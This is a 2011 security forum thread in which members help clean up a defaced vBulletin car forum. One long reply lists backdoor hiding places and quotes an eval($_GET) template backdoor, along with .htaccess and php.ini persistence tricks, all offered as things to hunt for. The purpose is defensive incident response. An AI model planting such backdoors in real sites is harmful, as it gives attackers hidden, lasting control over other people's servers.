.

Web page hacked. See if you can help?

<<

Joshsevo

User avatar

Sr. Member
Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 2:20 pm

Web page hacked. See if you can help?

So many of you know who I am but what you don't know is that I am a moderator on another forum that deals with my hobby outside of work.  It's a car forum my friend set up for the people like myself that own a specific type of car ( Mitsubishi Evolutions or also called Evo's)

Recently the site was hacked by a Sudan Security Team and my friend is having a hard time getting the site back under his control.  The company that owns the Vbulliten has  a back-up but it is of the pirated version that you see here. 

The site's address is called Coloradoevo.com

So is there anything that any of you can suggest or do for us.  There is around 400 members and this site has been a great palce for us to get together and talk about topics regarding our cars.  If anyone could help please let me know.
Security+, Network+, C|EH, CHFI, CPT
<<

millwalll

Post Mon Dec 19, 2011 3:43 pm

Re: Web page hacked. See if you can help?

Who hosts the site ? do they have any logs ? I would get the backup and take look at what they changed ? Is it just the main page that has been defaced ? The first step it trying to find how they got in so you can fix it. They do have email address have you tried to contact them ?
<<

l33t5h@rk

User avatar

Jr. Member
Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 4:09 pm

Re: Web page hacked. See if you can help?

Was the database backed up?
<<

Joshsevo

User avatar

Sr. Member
Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 4:31 pm

Re: Web page hacked. See if you can help?

The company that has the backups only has a backup of the hacked webpage.  So the owner is saying they may have lost everything.

I emailed the guy today and am waiting for a response.  They also have a facebook page that I may go on as well.
Security+, Network+, C|EH, CHFI, CPT
<<

l33t5h@rk

User avatar

Jr. Member
Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 5:05 pm

Re: Web page hacked. See if you can help?

Vbulletin looks like it is all db driven. I'm thinking if you get the latest version of the software, install it, then have them restore the database you might be out of the woods. This is pending their attack isn't on the db tier.
<<

l33t5h@rk

User avatar

Jr. Member
Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 5:12 pm

Re: Web page hacked. See if you can help?

I (hesitantly) went to the site and it does look like they just defaced it instead of actually hacking the thing, likely somebody just found a leak in the vBulletin software and exploited it that way. I'd say if you can restore the database w/ the updated software that's probably the most you can do for now.

FYI - this thing sadly happens a lot and is more annoying than damaging. I once had a phpBB site of mine undergo a similar treatment and I found that the time I spent being pissed about it was significantly less than the time it took me and my hosting provider (Verio) to fix it.
<<

Joshsevo

User avatar

Sr. Member
Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 6:27 pm

Re: Web page hacked. See if you can help?

Good heads up.  I looked into VBulliten defacing and found a few things that I sent to the owner to look into.

Also give me a opinion on this.

I reported their Facebook acct to FB as I feel that with them having a FB acct that FB is allowing them to run a criminal enterprise.  They clearly do this for fun/money as it's not just this webpage but many others and have a large outreach program to get others to join their efforts.  So hopefully FB will inquire why I reported them and then I can go into detail further.

All about making the hackers job more diffuclt to communicate with others.
Security+, Network+, C|EH, CHFI, CPT
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Mon Dec 19, 2011 9:00 pm

Re: Web page hacked. See if you can help?

Was the box that was hosting it rooted or was the site just defaced?
<<

Joshsevo

User avatar

Sr. Member
Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Mon Dec 19, 2011 9:56 pm

Re: Web page hacked. See if you can help?

Looks like it was just defaced.  Seems the VB that my buddy using is less secure than the most recent updates and the version that we have currently is one that everyone else stays away from.

Getting on the VBulletin looks like the admin's made a toold to help get rid of the defacing problems.  I forwarded the link to my buddy and let him help and then I will help out where I can.
Security+, Network+, C|EH, CHFI, CPT
<<

l33t5h@rk

User avatar

Jr. Member
Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Mon Dec 19, 2011 10:17 pm

Re: Web page hacked. See if you can help?

That's good news, have you got any info on whether or not the db was backed up?
<<

Joshsevo

User avatar

Sr. Member
Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Tue Dec 20, 2011 12:24 am

Re: Web page hacked. See if you can help?

According to my friend that told me a few days the DB was backed up with the defaced version.  He said they back it up every month and maybe that month ticked down seeing as this has been like this for maybe a week or so.
Security+, Network+, C|EH, CHFI, CPT
<<

l33t5h@rk

User avatar

Jr. Member
Jr. Member

Posts: 79

Joined: Tue Nov 22, 2011 12:06 am

Post Tue Dec 20, 2011 10:15 am

Re: Web page hacked. See if you can help?

That's interesting I figured it was just a php vuln that was exploited.

Best of luck
<<

Joshsevo

User avatar

Sr. Member
Sr. Member

Posts: 281

Joined: Tue Dec 29, 2009 11:00 pm

Post Fri Dec 23, 2011 1:46 pm

Re: Web page hacked. See if you can help?

So my buddy has gotten into the admin panel and has removed the screen that you saw when you logged onto the site.  He's working on it slowly but seems like he is getting there.
Security+, Network+, C|EH, CHFI, CPT
<<

millwalll

Post Fri Dec 23, 2011 4:24 pm

Re: Web page hacked. See if you can help?

Cool any news on how it was done ?
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Mon Dec 26, 2011 5:04 pm

Re: Web page hacked. See if you can help?

Even though I thought you were using phpBB, as that was what the cached version said, if you're using vBulletin, there's a few things to check in case of compromises:
1) Go through ALL plugins, there may be new ones that contain malicious code / backdoors.
2) Scan all templates for "eval" or similar commands. A PHP backdoor in vBulletin templates often begins with { or eval( , I think in vB4 backdoors can look like this: {vb:raw eval($_GET['haxx']) } (Not 100% sure but I've seen backdoors hidden in templates. It is _even_ possible to make a template look like it was never modified, meaning you can't assume a "red" color on a template means it was edited by a hacker.)
3) Make sure HTML is still disabled for all forum sections (this can pose a threat too).
4) Even if you have removed all backdoors from the admincp, INCLUDING the "cron" scripts, they can still be in a "cache" version of the entire site which I've experienced. This often occurs when one performs manual edits of the database as it seems vBulletin also uses the somewhat confusing "datastore" table as well for almost everything.

Okay, you've gone through templates, plugins, forum sections, cron scripts, and perhaps even the database. What now?

5) Now, you look for .php files that shouldn't be there, or altered php files that contains backdoors. Don't use the timestamps as a method of finding out whether a file was changed or not, as that can easily be tampered with as well. If the hackers weren't smart, they didn't change the timestamp to match the rest of the files. Sometimes, they also set the timestamp to a random date, where you perhaps, wasn't even near a computer. Such files should be checked.

6) You're not done yet, as some hackers change or add .htaccess files to make other extensions, often in subdirectories, executable as PHP. Meaning if you find a .htaccess file that shouldn't be there, it could contain a "php-handler" setting that all .jpg files in that directory should be executed as php, and the actual directory, could be new as well, but named something that could be a part of the original installation.

7) You've gone through almost everything, well, almost. There's also the php.ini file, where the setting auto_append_file appears to be the newest trick they're using. The setting appears to be "Off", even though it is set to be "0ff" (Zero f f), meaning it reads a file named "0ff" in /tmp/.. Reference: http://blog.sucuri.net/2011/12/malware- ... p-ini.html


As you can see, it's often better to start with a fresh set of PHP files, and delete _everything_ from the HTTP directory.

First and always, you take backup of the files, even if they're backdoored. It's a good learning experience, and it gives you insight into how the hackers work too, esp. if you study the access.log's which are often only deleteable by the root user, which are somewhat often left behind and not deleted.



The access.log is huge. Which is why you should always determine a point in time, where the attack may have occurred. Often a couple of hours if possible is best, and then you study the log, often for strange GET requests, or POST requests to files that shouldn't accept POST-requests at all, which may take time as well  :)



Merry X-mas, I hope you enjoyed this info as these are most of the tricks I've seen used  ;)
I'm an InterN0T'er
Next

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software